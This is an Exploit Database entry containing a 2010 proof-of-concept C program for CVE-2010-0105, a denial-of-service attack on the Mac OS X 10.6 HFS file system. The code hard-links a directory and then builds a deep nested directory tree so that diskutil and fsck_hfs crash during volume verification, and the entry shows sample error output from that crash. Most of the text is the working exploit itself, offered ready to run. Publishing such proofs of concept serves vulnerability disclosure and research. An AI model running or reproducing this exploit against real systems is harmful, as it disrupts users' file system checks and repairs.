Apple Mac OSX 10.6 – HFS FileSystem (Denial of Service)

• Exploit Database
• 9 阅读

• 作者： Maksymilian Arciemowicz
  日期： 2010-04-24
• 类别：

  • dos
  平台：

  • osx
• 来源：https://www.exploit-db.com/exploits/12375/

• // -----BEGIN PGP SIGNED MESSAGE-----
  // Hash: SHA1
  /* 	Proof of Concept for CVE-2010-0105
  	MacOS X 10.6 hfs file system attack (Denial of Service)
  	by Maksymilian Arciemowicz from SecurityReason.com
  
  	http://securityreason.com/achievement_exploitalert/15
  	
  	NOTE:
  	
  	This DoS will be localized in phase
  	
  	Checking multi-linked directories
  
  	So we need activate it with line
  	
  		connlink("C/C","CX");
  
  	Now we need create PATH_MAX/2 directory tree to make overflow.
  
  	and we should get diskutil and fsck_hfs exit with sig=8
  	
  	~ x$ diskutil verifyVolume /Volumes/max2
  	Started filesystem verification on disk0s3 max2
  	Performing live verification
  	Checking Journaled HFS Plus volume
  	Checking extents overflow file
  	Checking catalog file
  	Checking multi-linked files
  	Checking catalog hierarchy
  	Checking extended attributes file
  	Checking multi-linked directories
  	Maximum nesting of folders and directory hard links reached
  	The volume max2 could not be verified completely
  	Error: -9957: Filesystem verify or repair failed
  	Underlying error: 8: POSIX reports: Exec format error
  	
  		
  */
  #include <stdio.h>
  #include <unistd.h>
  #include <stdlib.h>
  #include <string.h>
  #include <sys/param.h>
  #include <sys/stat.h>
  #include <sys/types.h>
  
  
  int createdir(char *name){
  	if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR
  |S_IXUSR)){
  		printf("Can`t create %s", name);
  		exit(1);}
  		else
  		return 0;	
  }
  
  int comein(char *name){
  	if(0!=chdir(name)){
  		printf("Can`t chdir in to %s", name);
  		exit(1);}
  		else
  		return 0;	
  }
  
  int connlink(a,b)
  char *a,*b;
  {
  	if(0!=link(a,b)){
  		printf("Can`t create link %s => %s",a,b);
  		exit(1);}
  		else
  		return 0;	
  }
  
  int main(int argc,char *argv[]){
  	
   	int level;
  	FILE *fp;
  	
  	if(argc==2) {
  		level=atoi(argv[1]);
  	}else{
  		level=512; //default
  	}
  	createdir("C"); //create hardlink
  	createdir("C/C"); //create hardlink
  	
  	connlink("C/C","CX"); //we need use to checking multi-linked directorie
  
  	comein("C");
  	
  	while(level--)
  			printf("Level: %i mkdir:%i chdir:%i\n",level,
  			createdir("C"),
  			comein("C"));		
  	
  	
  	printf("check diskutil verifyVolume /\n");
  	return 0;
  }
  /*
  - -- 
  Best Regards,
  - ------------------------
  pub 1024D/A6986BD6 2008-08-22
  uidMaksymilian Arciemowicz (cxib)
  <cxib@securityreason.com>
  sub 4096g/0889FA9A 2008-08-22
  
  http://securityreason.com
  http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
  -----BEGIN PGP SIGNATURE-----
  
  iEYEARECAAYFAkvTTQsACgkQpiCeOKaYa9bHwACfSRqy8xJbJBGFvLbLIjabxMkI
  to4AoMMetii9Gc7EyOK7/3+QP4ynP5kY
  =IML/
  -----END PGP SIGNATURE-----
  */